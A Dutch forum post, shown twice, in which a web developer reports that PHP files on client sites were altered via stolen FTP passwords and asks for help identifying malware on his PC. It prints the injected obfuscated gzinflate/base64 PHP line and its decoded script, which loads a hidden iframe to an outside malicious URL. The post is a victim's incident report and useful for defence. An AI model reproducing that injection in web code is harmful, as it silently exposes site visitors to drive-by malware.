:strip_icc():strip_exif()/u/83500/lfsmall.jpg?f=community)
Jongens, ik hoop zwaar dat jullie me kunnen helpen.
(Tis een lang verhaal, geen zin om te lezen: onderaan een samenvatting).
Ik werk als webdeveloper, en vanochtend kwamen we erachter dat op diverse sites van ons kwaadaardige code was neergezet.
Op een aantal domeinen was op verschillende plaatsen in de php het volgende neergezet:
De base64-string verschilt per keer, maar allemaal encoden ze naar het volgende:
Oftewel, deze code genereert een onzichtbaar iframe waarin de bezoeker naar http://www.lifeshiftdevelopment.com/stats.php geleid wordt.
Google heeft daar de volgende informatie over:
http://safebrowsing.clien...client=googlechrome&hl=nl
Niet goed dus!
Een collega van mij heeft in de serverlogs gekeken hoe dit tot stand is gekomen, en het blijkt dat de php-bestanden via ftp gewijzigd waren. Deze malware-maker heeft dus op een of andere manier (op zijn minst) FTP-passwords buitgemaakt.
Via zoeken in de logfiles op FTP-verkeer buiten onze eigen ip's en zoeken naar de base64_decode-functie in de php files konden we snel genoeg alle getroffen domeinen vinden.
Op die domeinen hebben we de kwaadaardige code verwijderd en de FTP-passwords veranderd.
Maar toen viel het op, dat alle geïnfecteerde domeinen, sites waren waar ik de laatste maanden aan gewerkt heb. Ook doordat er ook bijvoorbeeld één prive-domein van mij bij zat, waar puur en alleen ik aan gewerkt heb, weten we zeker dat de "hacker" via mijn pc aan de FTP-passwords is gekomen
Er moet dus malware of iets dergelijks staan op mijn werk-pc die deze gegevens heeft doorgestuurd naar de kwaadaardige partij.
Maar dan nu de hamvraag: als de "hacker" mijn FTP-passwords heeft, wat heeft hij dan nog meer?
Is het een network-sniffer (ftp-passwords worden onversleuteld over het netwerk verzonden), of een keylogger?
In het geval van dat laatste, dan is er nog véél meer gevoelige informatie doorgestuurd, zoals al mijn eigen privé wachtwoorden (mail, social media, diverse sites zoals deze, Paypal, etc.).
Nu ga ik uiteraard alle wachtwoorden wijzigen, maar ik wil er graag achter komen hoe de "hacker" aan de passwords is gekomen, en of hij alleen FTP-passwords heeft, ook ook andere dingen. Als het alleen FTP-passwords zijn, kan ik in ieder geval een klein beetje rustiger ademhalen.
En daar kom ik niet uit, dus wil ik jullie hulp inschakelen.
De volgende scanners heb ik geprobeerd, ik ben er al de hele dag mee bezig. In de volgende volgorde:
Maar nu kan ik er niks meer mee. HitmanPro geeft namelijk totaal geen clue van waarom een file als trojan/malware aangemerkt is, en welk virus dat dan zou zijn. Zo kan ik er dus niet achterkomen wat deze malware gedaan zou hebben, en weet ik dus niet of er behalve de FTP-passwords nog meer is buitgemaakt.
Wellicht heb ik de scan-tools in de verkeerde volgorde gebruikt, en heeft Hitman dus de malware verwijderd voordat een ander programma er wat zinnigs over kon zeggen.
Maarja, in al mijn jaren als fanatiek pc-gebruiker is mij zoiets nog nooit overkomen en "Hitman" kwam als eerste in mij op als malware-scanner.
Maar goed, de enige info die Hitman geeft zijn de filenames, en dat zijn de volgende:
In tekst:
Ook gezocht of Hitman misschien een logfile heeft met de Trojan/Malware-namen, maar die kan ik ook niet vinden.
Wat ik tot dusver gevonden heb:
1. ~!#8007.tmp
Op de eerste vind ik niet veel. Volgens "SUPERAntiSpyware" (een naam die ik al bijna niet serieus durf te nemen), is het een FakeAV (fake AntiVirus). Generieke naam dus waarover Symantec zegt:
2. tempfiles.exe
Via deze site:
https://www.virustotal.co...74e69cf6149817f/analysis/
Kom ik op Microsoft's benaming "Karagany.I".
Microsoft schrijft daar vervolgens over:
Sirefef:
Op de bovengenoemde pagina van virustotal.com wordt ook de namen "Gimemo" en "Ransom" genoemd. Deze uiteraard ook opgezocht. Daarover het volgende gevonden:
Andere namen slaan vooral op "Generic trojan", waar ik dus absoluut niks mee kan.
Voorlopig tast ik dus nog in het duister wat deze "tempfiles.exe" gedaan zou hebben.
3. installer_hair_pro.exe
Hier vind Google slechts 3 (!) sites voor. Onder andere weer Virustotal.com: https://www.virustotal.co...f247b011198ee72/analysis/
Die geeft aan dat heel veel virusscanners dit niet aanmerken als malware/virus.
Drie wel:
1. "Adware.Downware.174": met het versie-nummer erbij niks over te vinden.
Zonder versienummer zegt McAffee:
This software is not a virus or a Trojan.
2. "Riskware/ToogleToolbar": niks (!) op te vinden.
3. Win32/Toggle: ook al zo goed als niks op te vinden...
Ik heb uiteraard nog wat meer rondgeklikt, had op een gegeven moment wel 10 browsers met ieder 25 tabs openstaan ongeveer. Maar meer informatie kwam er niet.
Ik tast dus volledig in het duister wat er nu precies op mijn systeem staat... En of nu alleen FTP-password in verkeerde handen zijn gevallen, of nog veel meer.
Heeft een van jullie tips hoe dit verder te kunnen onderzoeken?
Ik heb me letterlijk de hele dag suf gegoogled, heel mijn werkdag eraan besteed.. Verder dan bovenstaand verhaal kom ik niet. Heb er mooi de pest in.. Ik neem mezelf erg serieus als webdeveloper en probeer altijd mijn code netjes en veilig te houden; let altijd op user-input sanitizing etcetera om ervoor te zorgen dat kwaadwilligen niks stuk kunnen maken. En dan gebeurt er zoiets!!
/edit:
Ohja, ook nog met WireShark gekeken naar verdacht netwerkverkeer. Niks kunnen ontdekken.
Hopelijk kan een van jullie mij verder helpen...
Alvast bedankt!
TL;DR:
Ik zoek de Malware/Virus-namen en bijbehorende descriptions van de volgende filenames, om erachter te komen wat ze gedaan kunnen hebben:
(Tis een lang verhaal, geen zin om te lezen: onderaan een samenvatting).
Ik werk als webdeveloper, en vanochtend kwamen we erachter dat op diverse sites van ons kwaadaardige code was neergezet.
Op een aantal domeinen was op verschillende plaatsen in de php het volgende neergezet:
PHP:
1
2
3
| #c3284d# echo(gzinflate(base64_decode("7VGxTsMwEP0Vy0ttqXLKmrRIpWJDsLAhBic+xyc5sWVfkkaUfydVKxZAgp033end0713x9g/fottbhJGuh11YkPyO+6IYlkU0zQpjxayQ0sGRvAhdtCTakJXZNKUVXSRV2iF6PWIraaQ1JAh7dvzGIWHMEE66AxCKuwNHJ+s4F1G4PJ2t5Gn0190FhPYcLxI5dvZrd2Z0AwXTwk0wb2HcydWaJPuYCUrqzLQnihhPRAIPqEhx9f8hn/lHGDr6Acyp4avl/N8w9DsYVGNmLFGjzSXzKEx0FcshoyEoS+ZrnPwy3zFPFgq2SZSxSjES7Us/IzSAl1z5Lv5WbePSxLB62BmLl82r0rHCL05OPRGWPm+La7/+wA="))); #/c3284d# |
De base64-string verschilt per keer, maar allemaal encoden ze naar het volgende:
HTML:
1
| <script>var url="http://www.lifeshiftdevelopment.com/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script> |
Oftewel, deze code genereert een onzichtbaar iframe waarin de bezoeker naar http://www.lifeshiftdevelopment.com/stats.php geleid wordt.
Google heeft daar de volgende informatie over:
http://safebrowsing.clien...client=googlechrome&hl=nl
Niet goed dus!
Een collega van mij heeft in de serverlogs gekeken hoe dit tot stand is gekomen, en het blijkt dat de php-bestanden via ftp gewijzigd waren. Deze malware-maker heeft dus op een of andere manier (op zijn minst) FTP-passwords buitgemaakt.
Via zoeken in de logfiles op FTP-verkeer buiten onze eigen ip's en zoeken naar de base64_decode-functie in de php files konden we snel genoeg alle getroffen domeinen vinden.
Op die domeinen hebben we de kwaadaardige code verwijderd en de FTP-passwords veranderd.
Maar toen viel het op, dat alle geïnfecteerde domeinen, sites waren waar ik de laatste maanden aan gewerkt heb. Ook doordat er ook bijvoorbeeld één prive-domein van mij bij zat, waar puur en alleen ik aan gewerkt heb, weten we zeker dat de "hacker" via mijn pc aan de FTP-passwords is gekomen
Er moet dus malware of iets dergelijks staan op mijn werk-pc die deze gegevens heeft doorgestuurd naar de kwaadaardige partij.
Maar dan nu de hamvraag: als de "hacker" mijn FTP-passwords heeft, wat heeft hij dan nog meer?
Is het een network-sniffer (ftp-passwords worden onversleuteld over het netwerk verzonden), of een keylogger?
In het geval van dat laatste, dan is er nog véél meer gevoelige informatie doorgestuurd, zoals al mijn eigen privé wachtwoorden (mail, social media, diverse sites zoals deze, Paypal, etc.).
Nu ga ik uiteraard alle wachtwoorden wijzigen, maar ik wil er graag achter komen hoe de "hacker" aan de passwords is gekomen, en of hij alleen FTP-passwords heeft, ook ook andere dingen. Als het alleen FTP-passwords zijn, kan ik in ieder geval een klein beetje rustiger ademhalen.
En daar kom ik niet uit, dus wil ik jullie hulp inschakelen.
De volgende scanners heb ik geprobeerd, ik ben er al de hele dag mee bezig. In de volgende volgorde:
- Microsoft Security Essentials. Deze draaide standaard op mijn pc en heeft geen melding gegeven. Ook na een handmatige scan: No threats were detected.
- HitmanPro: 3 threats
- Kaspersky TDSSKiller (rootkit-scanner): Found 0 threats
- Spybot S&D: Gefliciteerd, er wereden geen bedreigingen aangetroffen
- Malwarebytes: Objecten gedetecteerd: 0.
Maar nu kan ik er niks meer mee. HitmanPro geeft namelijk totaal geen clue van waarom een file als trojan/malware aangemerkt is, en welk virus dat dan zou zijn. Zo kan ik er dus niet achterkomen wat deze malware gedaan zou hebben, en weet ik dus niet of er behalve de FTP-passwords nog meer is buitgemaakt.
Wellicht heb ik de scan-tools in de verkeerde volgorde gebruikt, en heeft Hitman dus de malware verwijderd voordat een ander programma er wat zinnigs over kon zeggen.
Maarja, in al mijn jaren als fanatiek pc-gebruiker is mij zoiets nog nooit overkomen en "Hitman" kwam als eerste in mij op als malware-scanner.
Maar goed, de enige info die Hitman geeft zijn de filenames, en dat zijn de volgende:
In tekst:
- ~!#8007.tmp (Trojan)
- tempfiles.exe (Trojan)
- installer_hair_pro.exe (Malware)
Ook gezocht of Hitman misschien een logfile heeft met de Trojan/Malware-namen, maar die kan ik ook niet vinden.
Wat ik tot dusver gevonden heb:
1. ~!#8007.tmp
Op de eerste vind ik niet veel. Volgens "SUPERAntiSpyware" (een naam die ik al bijna niet serieus durf te nemen), is het een FakeAV (fake AntiVirus). Generieke naam dus waarover Symantec zegt:
Hoewel ook vervelend, lijkt het me onwaarschijnlijk dat deze mijn passwords heeft weggegeven.
2. tempfiles.exe
Via deze site:
https://www.virustotal.co...74e69cf6149817f/analysis/
Kom ik op Microsoft's benaming "Karagany.I".
Microsoft schrijft daar vervolgens over:
Deze jongen installeert dus andere malware. Hoewel die niet gedetecteerd is, wel interessant om die twee op te zoeken.
Sirefef:
Die is het dus niet.
Ook zo'n FakeAV-ding. Is het dus ook niet.
Op de bovengenoemde pagina van virustotal.com wordt ook de namen "Gimemo" en "Ransom" genoemd. Deze uiteraard ook opgezocht. Daarover het volgende gevonden:
Dit is hem dus ook niet.
Andere namen slaan vooral op "Generic trojan", waar ik dus absoluut niks mee kan.
Voorlopig tast ik dus nog in het duister wat deze "tempfiles.exe" gedaan zou hebben.
3. installer_hair_pro.exe
Hier vind Google slechts 3 (!) sites voor. Onder andere weer Virustotal.com: https://www.virustotal.co...f247b011198ee72/analysis/
Die geeft aan dat heel veel virusscanners dit niet aanmerken als malware/virus.
Drie wel:
1. "Adware.Downware.174": met het versie-nummer erbij niks over te vinden.
Zonder versienummer zegt McAffee:
This software is not a virus or a Trojan.
2. "Riskware/ToogleToolbar": niks (!) op te vinden.
3. Win32/Toggle: ook al zo goed als niks op te vinden...
Ik heb uiteraard nog wat meer rondgeklikt, had op een gegeven moment wel 10 browsers met ieder 25 tabs openstaan ongeveer. Maar meer informatie kwam er niet.
Ik tast dus volledig in het duister wat er nu precies op mijn systeem staat... En of nu alleen FTP-password in verkeerde handen zijn gevallen, of nog veel meer.
Heeft een van jullie tips hoe dit verder te kunnen onderzoeken?
Ik heb me letterlijk de hele dag suf gegoogled, heel mijn werkdag eraan besteed.. Verder dan bovenstaand verhaal kom ik niet. Heb er mooi de pest in.. Ik neem mezelf erg serieus als webdeveloper en probeer altijd mijn code netjes en veilig te houden; let altijd op user-input sanitizing etcetera om ervoor te zorgen dat kwaadwilligen niks stuk kunnen maken. En dan gebeurt er zoiets!!
/edit:
Ohja, ook nog met WireShark gekeken naar verdacht netwerkverkeer. Niks kunnen ontdekken.
Hopelijk kan een van jullie mij verder helpen...
Alvast bedankt!
TL;DR:
Ik zoek de Malware/Virus-namen en bijbehorende descriptions van de volgende filenames, om erachter te komen wat ze gedaan kunnen hebben:
- ~!#8007.tmp (Trojan)
- tempfiles.exe (Trojan)
- installer_hair_pro.exe (Malware)
:strip_icc():strip_exif()/u/18606/crop63ebc46666763_cropped.jpg?f=community)